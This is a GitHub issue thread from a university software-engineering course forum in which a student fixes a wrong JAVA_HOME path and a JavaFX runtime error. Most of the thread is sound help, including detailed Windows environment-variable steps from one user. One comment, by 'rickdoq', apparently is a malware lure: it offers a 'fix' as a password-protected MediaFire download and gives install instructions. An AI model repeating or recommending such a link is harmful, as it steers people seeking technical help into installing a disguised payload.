### ISSUE TITLE
JAVA_HOME directory

### ISSUE THREAD

**Issue by calebchongsj** [nus-cs2103-AY2425S1/forum#151]
ERROR: JAVA_HOME is set to an invalid directory: C:\Program Files\Java\jdk-1.8

Please set the JAVA_HOME variable in your environment to match the
location of your Java installation.

Hi, could anyone kindly guide me on how do I chang my JAVA_HOME directory on Intellij IDEA?

Thank you.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by calebchongsj** [comment]
Error: JavaFX runtime components are missing, and are required to run this application

I have imported the JavaFX files into my build.gradle file. However, I still got this error. Could someone help me to troubleshoot?

**Comment by damithc** [comment]
@calebchongsj Providing some additional context might help e.g., which iP increment were you trying to do when you encountered this error?

**Comment by calebchongsj** [comment]
@damithc Hi Prof, I am stuck at the first part of the Java FX tutorial. I am trying to run my first JavaFX application.

**Comment by uniqly** [comment]
I assume you are using Windows, and it looks like your `JAVA_HOME` path variable is incorrectly set up?

First you want to go to your path variables, you can do this by searching `Edit the system environment variables` in Windows search bar which brings you to a `System Properties` window.  

![image](https://github.com/user-attachments/assets/bb919c11-1938-41a6-879f-ff98f4abc4bd)

Then click `Environment Variables` which brings you to the `Environment Variables` window.

![image](https://github.com/user-attachments/assets/6eeb5585-73ad-485c-a8ff-b2b08a243bb9)

Then under the `System Variables` section, look in the `Variable` tab for `JAVA_HOME`.

![Screenshot 2024-08-31 145543](https://github.com/user-attachments/assets/4ee77a01-c74f-4100-a38b-24f11470b89b)

In there you should be able to change it to the Java 17 SDK probably called `C:\Program Files\Java\jdk-17`, you can double click the row to edit it and then after changing it press `Ok`.

![image](https://github.com/user-attachments/assets/ab023c85-99b9-4a66-a80b-79f9c8d2094d)

**Comment by damithc** [comment]
Thanks for sharing these detailed instructions @uniqly 💯

**Comment by calebchongsj** [comment]
Thank you so much for your help @uniqly. I am able to open my JavaFX application now.
